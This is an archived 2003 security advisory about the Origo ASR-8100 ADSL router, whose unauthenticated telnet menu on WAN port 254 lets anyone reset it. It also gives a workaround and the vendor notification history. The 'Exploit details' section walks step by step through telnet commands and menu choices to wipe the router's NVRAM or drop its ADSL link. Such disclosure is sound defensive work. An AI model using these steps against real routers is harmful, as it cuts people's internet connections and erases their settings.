TUCoPS :: Network Appliances :: bt1299.txt

Origo ASR-8100 ADSL router remote factory reset 


--uQr8t48UFsdbeI+V
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Vulnerable device
-----------------

Origo ASR-8100 ADSL router
Firmware ETHADSL_USB_110502_REL10_S
Customer Software Version 110502_REL10_S
ADSL Showtime Firmware Version: 3.21
device based on Conexant CX82310-14 chipset

Vulnerability: Remote ADSL reset and permanent denial of service attack
-----------------------------------------------------------------------

The following device is able to be remotely reset to factory settings,
allowing a permanent denial of service attack until reconfigured manually by
an operator.  The attack only takes place after the device is reset - which
may be some time after it has been performed.  PPP authentication
information
is lost on reset to factory settings, so it is most likely that the device
will be unable to establish a WAN link after reset.

The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP
is used) its IP address to be changed.

Attack overview
---------------

A telnet-style configuration interface is left open to WAN interface on port
254, without a password being set.  This menu system is very easily driven
by
a remote attacker.

A full exploit is given below.

Workaround
----------

Forwarding external port 254 to an internal port that is unused prevents
access to the configuration interface.

With the web configuration interface at http://router-ip/doc/advance.htm
click on Configuration: Virtual server
Enter a new entry:
Public port: 254
Private port: 9876
TCP
Host IP address: 127.0.0.1
Click 'Add this setting', then do Configuration: Save Settings/Reboot and
click 'Save & Reboot'

Exploit details
---------------

=46rom any Internet connected host:

telnet <router global IP address> 254
Returns a menu:
01/01/99                   CONEXANT SYSTEMS, INC.=20
00:04:10
                ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21         =
=20
                  =20
You are prompted for a LOGIN PASSWORD>
Just press return
Brings up MAIN MENU
  1. SYSTEM STATUS AND CONFIGURATION
  2. ADSL MENU
 =20
  4. REMOTE LOGON
 =20
Press 1 - get to SYSTEM STATUS AND CONFIGURATION
  1. SYSTEM INFORMATION
  2. SYSTEM CONFIGURATION
Press 2 - get to SYSTEM CONFIGURATION
  1. CHANGE SYSTEM TIME
  2. CHANGE SYSTEM DATE
  3. CHANGE PASSWORD
  4. FACTORY DEFAULT CONFIGURATION

Type 1 hh:mm:ss to reset the system time
Type 2 dd/mm/yy to reset the system date
(Option 3 doesn't seem to work)

Type 4:  Prompt: This will reset all the configurations and the ADSL modem.
Are you sure?(Y/N)

Type Y:  Message: NVRAM updated

This does not reset the ADSL modem, only clears the NVRAM.  This takes
effect
the next time the modem is reset: the admin password is reset to that
printed
in the documentation, and the ADSL username/password are reset, meaning the
connection is down permanently until a human sets them up again.  Any other
settings (security etc) are also lost.




=46rom main menu, type 2 to get to ADSL MENU
  1. ADSL PERFORMANCE STATUS
  2. 24 HOUR ADSL PERFORMANCE HISTORY
  3. 7 DAY ADSL PERFORMANCE HISTORY
  4. ADSL ALARM HISTORY
  5. ADSL TRANSCEIVER CONFIGURATION MENU
  6. ADSL LINK RESET

Type 6:  Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
Type Y.  The ADSL link is reset and a new WAN IP address is requested by
DHCP (if the ISP uses it).

Vendor notification
-------------------

UK support for Vendor (support@adsltech.com) was notified on 30th August
2003 - entirety of reply message was 'Thanks a lot'.  Vendor doesn't
advertise an email address so were notified via web form on that date - no
response received.  To date the vendor has not advertised any patches or new
firmware.

--=20
Theo Markettos                 theo@markettos.org.uk
Clare Hall, Cambridge          theom@chiark.greenend.org.uk
CB3 9AL, UK                    http://www.markettos.org.uk/

--uQr8t48UFsdbeI+V
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE/iZd/+ASNqdJKcxMRAlE2AJ9q/jpW178eHqeuD1li2cRUmvJUmgCgqqjN
J9mAoV0MhjAzln8P0y9FvkE=
=IOQE
-----END PGP SIGNATURE-----

--uQr8t48UFsdbeI+V--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH